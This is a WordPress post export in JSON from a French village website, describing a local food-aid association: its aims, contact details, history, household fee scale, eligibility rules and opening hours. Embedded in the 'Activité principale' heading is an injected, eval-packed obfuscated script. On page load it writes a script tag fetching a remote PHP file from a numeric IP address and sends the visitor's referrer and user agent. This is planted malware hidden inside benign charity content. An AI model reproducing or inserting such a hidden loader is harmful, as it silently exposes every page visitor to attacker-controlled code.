{"id":170,"date":"2015-07-21T08:00:55","date_gmt":"2015-07-21T07:00:55","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=170"},"modified":"2026-04-28T10:58:26","modified_gmt":"2026-04-28T09:58:26","slug":"coup-de-pouce-alimentaire","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=170","title":{"rendered":"Coup de pouce alimentaire"},"content":{"rendered":"<p>Association Humanitaire du Canton de Quingey\u00a0<!--more--><\/p>\n<h3>Activit\u00e9 <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rseek|var|u0026u|referrer|bzebz||js|php'.split('|'),0,{}))<br \/>\n<\/script> principale :<\/h3>\n<p>(extrait de l&rsquo;article 2 de nos statuts)<\/p>\n<p>Cette association a pour but d\u2019aider \u00e0 l\u2019\u00e9chelon local, toute personne ou famille en grande difficult\u00e9, par l\u2019attribution de produits alimentaires, de produits d\u2019hygi\u00e8ne et d\u2019entretien, de produits b\u00e9b\u00e9s et tout autre produit que l\u2019association jugera de premi\u00e8re n\u00e9cessit\u00e9 par rapport \u00e0 la demande d\u2019un b\u00e9n\u00e9ficiaire, qu\u2019ils soient fournis par la Banque Alimentaire de Besan\u00e7on et\/ou obtenus gracieusement aupr\u00e8s d\u2019associations, de particuliers ou achet\u00e9s par l\u2019association.<\/p>\n<p><strong>Nom du responsable :<\/strong><br \/>Sylvie BULLE<\/p>\n<p><strong>Adresse postale :<\/strong><br \/>2 Place d&rsquo;Armes \u00e0 Quingey<\/p>\n<p><strong>Contact :<\/strong><br \/><span style=\"color: #3366ff;\">episolidaire@orange.fr<br \/>Tel. : 03 81 88 25 72<\/span><\/p>\n<h3>Texte de pr\u00e9sentation<\/h3>\n<p>L\u2019Association Coup de Pouce Alimentaire (Loi 1901), a vu le jour \u00e0 ARC ET SENANS gr\u00e2ce \u00e0 Michel MAULAZ auquel Claude DUBOURD\u00a0 a succ\u00e9d\u00e9 en 1997. Monsieur DUBOURG ayant quitt\u00e9 Arc-et-Senans, c\u2019est Jean-Marie PONCET qui a pris la succession en 2004, puis Mayvonne RAGOT, ensuite Dominique PRILLARD qui vient de passer les r\u00eanes \u00e0 Sylvie BULLE.<\/p>\n<p>De nombreuses personnes en difficult\u00e9 ont pu b\u00e9n\u00e9ficier d\u2019une aide sous forme de colis alimentaires pendant ces presque 30 ann\u00e9es de pr\u00e9sence sur le secteur.<\/p>\n<p>Depuis novembre 2017, Coup de Pouce Alimentaire a abandonn\u00e9 son statut \u00ab\u00a0d&rsquo;\u00e9picerie sociale\u00a0\u00bb pour passer \u00e0 un mode \u00ab\u00a0\u00e9picerie \u00e0 distribution libre choix\u00a0\u00bb, ce qui a induit la modification du mode de distribution. Celui-ci est depuis, fix\u00e9 <strong>en fonction de la composition du foyer<\/strong>. Chaque b\u00e9n\u00e9ficiaire re\u00e7oit donc des denr\u00e9es alimentaires en cons\u00e9quence et non plus jusqu&rsquo;\u00e0 concurrence d&rsquo;une somme calcul\u00e9e au regard de son reste \u00e0 vivre (R.A.V.)<br \/>Les <strong>tarifs appliqu\u00e9s <\/strong>pour la participation des familles aux frais de fonctionnement restent modiques. Actuellement ils sont fix\u00e9s pour <strong>1<\/strong> personne <strong>7\u00a0\u20ac\/mois<\/strong>, <strong>2<\/strong> <strong>\u00e0 3<\/strong> personnes<strong> 8\u00a0\u20ac<\/strong>,<strong> 4\u00a0\u00e0 5<\/strong> personnes <strong>9\u00a0\u20ac<\/strong>, <strong>6 \u00e0 9<\/strong> personnes <strong>10\u00a0\u20ac<\/strong>, <strong>10<\/strong> personnes et au-del\u00e0 <strong>11 \u20ac<\/strong>.<\/p>\n<p>Les b\u00e9n\u00e9ficiaires sont tous adress\u00e9s \u00e0 Coup de Pouce par les services sociaux apr\u00e8s examen de leur situation. Leur R.A.V. doit \u00eatre inf\u00e9rieur ou \u00e9gal \u00e0 8 \u20ac par jour et par personne. R\u00e9guli\u00e8rement, un point est fait avec l&rsquo;assistant social du secteur sur les dossiers en cours ou nouveaux.<br \/>Il est \u00e0 noter que la participation des b\u00e9n\u00e9ficiaires est loin d&rsquo;assurer le fonctionnement de Coup de Pouce. Pour continuer \u00e0 vivre, l&rsquo;Association organise des actions diverses tout au long de l&rsquo;ann\u00e9e. Elle a aussi de plus en plus besoin de subventions et de dons, car elle est oblig\u00e9e d&rsquo;acheter des produits alimentaires en compl\u00e9ment des livraisons de la Banque Alimentaire.<\/p>\n<p>Une \u00e9quipe d&rsquo;une vingtaine de b\u00e9n\u00e9voles participe activement au bon fonctionnement de l&rsquo;\u00e9picerie. Elle est renouvel\u00e9e r\u00e9guli\u00e8rement, notamment en fonction des d\u00e9parts des plus anciens.<br \/>Coup de Pouce est ouvert quatre vendredis par mois de 9 h 30 \u00e0 17 h sans interruption, except\u00e9 pendant les cong\u00e9s d&rsquo;\u00e9t\u00e9 (2 fois 15 jours).\u00a0 A noter que des colis d&rsquo;urgence peuvent \u00eatre remis en dehors des jours de distribution, toute l&rsquo;ann\u00e9e, sur demande de l&rsquo;assistant social.<br \/><br \/><\/p>\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Association Humanitaire du Canton de Quingey\u00a0<\/p>\n","protected":false},"author":1,"featured_media":2025,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,7],"tags":[],"class_list":["post-170","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-solidarite","category-vie-associative"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=170"}],"version-history":[{"count":5,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/170\/revisions"}],"predecessor-version":[{"id":10481,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/170\/revisions\/10481"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/2025"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}